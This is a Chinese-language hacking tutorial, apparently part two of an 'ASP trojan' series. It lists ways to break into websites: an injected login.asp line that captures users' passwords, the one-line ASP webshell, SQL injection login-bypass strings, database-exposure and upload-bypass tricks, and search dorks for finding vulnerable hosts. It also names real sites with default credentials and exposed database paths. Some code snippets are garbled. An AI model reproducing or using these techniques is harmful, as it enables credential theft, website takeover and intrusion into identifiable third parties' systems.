让你变成ASP木马高手 (二)

11. 名称:利用QQ在线状态抓鸽子肉鸡  
生成qq在线状态,把里面的地址改成木马地址,发到论坛  
在login.asp那里插入一句:  
response.write"&""&"&p="&request("password")&">"  
response.write"&""&"&p="&request("password")&">"  
结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里  
12. 动画名称:媒体中国整站程序存在多处漏洞  
漏洞程序:媒体中国整站程序(第一版)  
官方网站: http://meiti.elgod.com/  
漏洞: %5c(暴库) 上传 注入  
上传页面:down1/upload.asp  
13. 名称:免费电话+MSH命令行工具  
http://www.globe7.com/ 打开主页,点击坐下角,Free DownLoad,下载到本地,安装,  
运行后,会提示正在寻找你所在地区的区号。由于是国际长途,注册一个帐号,送100美分,国内计时  
0.01/分,你就有100分钟可以白打。是一个帐号哦。  
要注意的就是,固定电话,小灵通 形式为0086521123456 521本来时0521,要省略前面的零,手机号也  
是一样。  
14. 名称:Bo-Blog的新漏洞  
http://网址/index.php?job=../admin/ban  
把其中"禁止搜索的词"那部分另存出来,里面的地址改完整,插入一句话木马  
15. 名称:钩魂者入侵传奇私服  
用百度 搜索 传奇 inurl:tuku  
或者 传奇 inurl:wplm.htm  
再或者 传奇 inurl:coolsites.asp  
友情链接里插入一句话木马即可  
16. 程序: 宏达企业整站上传漏洞  
官方主页: http://www.mu126.com/  
漏洞页面:/cx/upfile.asp (上传漏洞)  
17.无间盗邮箱,在修改密码里,用户名和密码里添or=or  
18.名称: bbsxp5.16后台得到webshell  
bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传,就是在基本设置上添加上上传类型也不行,并禁  
止了修改数据备份数据名称,我们可以把此网页保存在本地,改源代码上传。  
19.名称:JHACKJ 2005年最新精典教程  
下载看看吧,不错,各大网站都有  
20.名称:省力入侵韩国肉鸡  
在啊D的扫描注入点项,打开这个: http://www.google.co.kr/advanced_search?hl=zh-CN  
这是高级搜索项,关键字随便写。这里我写asp?name= 设置为每页显示100条。  
语种选择韩文。搜索,很多sa.  
21.名称:任何网吧的管理系统破解  
选智能ABC,然后vv输入,光标后退两步,按delete键 刚输入的两个vv删除  
最后按Inter键  
22.名称:破解QQ空间插入网页木马的代码  
现在腾讯 已经封了很多QQ空间代码了 就如 以前 插入网页木马的代码也早被封了  
突破禁用的方法 代码如下:  
style=display:none>
  
最后附上 卡拉是条ok 总结的  
1.上传漏洞[不多讲]  
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现"请登陆后使用",80%就有漏洞了!  
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.  
2.注入漏洞[不多讲]  
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:  
http://注入网址;update admin set password=/新MD5密码/ where password=/旧MD5密码/--  
[admin为表名.]  

3.旁注,也就是跨站.  
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个  
站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经  
过加密,这就看我们的本事了  

4.暴库:把二级目录中间的/换成%5c  
EY: http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1  
如果你能看到:/E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa/不是一个有效的路径。 确定路  
径名称拼写是否正确,以及是否 连接到文件存放的服务器。  
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.  

5./or/=/or/这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:  
/or//=/ " or "a"="a /) or (/a/=/a ") or ("a"="a or 1=1-- / or /a/=/a  
6.社会工程学。这个我们都知道吧。就是猜解。  
 EY: http://www.neu.edu.cn/waishi/admin  
admin waishi  
7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本.  
EY: http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话  
木马  

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.  
EY: http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp  
这个站用的是:杰出校友录,源码我下过了,  
默认数据库/webshell路径:databaseliangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是  
admin  

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.  
/Databackup/dvbbs7.MDB  
/bbs/Databackup/dvbbs7.MDB  
/bbs/Data/dvbbs7.MDB  
/data/dvbbs7.mdb  
/bbs/diy.asp  
/diy.asp  
/bbs/cmd.asp  
/bbs/cmd.exe  
/bbs/s-u.exe  
/bbs/servu.exe  
工具:网站猎手 挖掘鸡  
EY: http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB  
10.查看目录法:人一些网站可以断开目录,可以方问目录。  
EY: http://www.ujs168.com/shop/admin/  
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/  
这样我们可以找到数据库,下载不用我教吧  
11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]  
12.搜索引擎利用:  
(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/  
(2).找网站的管理后台地址:  
site:xxxx.comintext:管理  
site:xxxx.comintitle:管理 <关键字很多,自已找>  
site:xxxx.cominurl:login  
(3).查找access的数据库,mssql、mysql的连接文件  
allinurl:bbsdata  
filetype:mdbinurl:database  
filetype:incconn  
inurl:datafiletype:mdb  
我主不做了。。自已做做吧。。  
13.COOKIE欺骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。  
这个我就不多讲了  

14.利用常见的漏洞:如动网BBS  
EY: http://js1011.com/bbs/index.asp  
可以先用:dvbbs权限提升工具,使自已成为前台管理员。  
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert  
取得Cookies/NC包  
这个我就不做了,网上教程多的是,自已下个看看。  
工具:dvbbs权限提升工具 动网固顶贴工具  
15.还有一些老漏洞。如IIS3,4的查看源码,5的delete  
CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。  

你可能感兴趣的:(让你变成ASP木马高手 (二))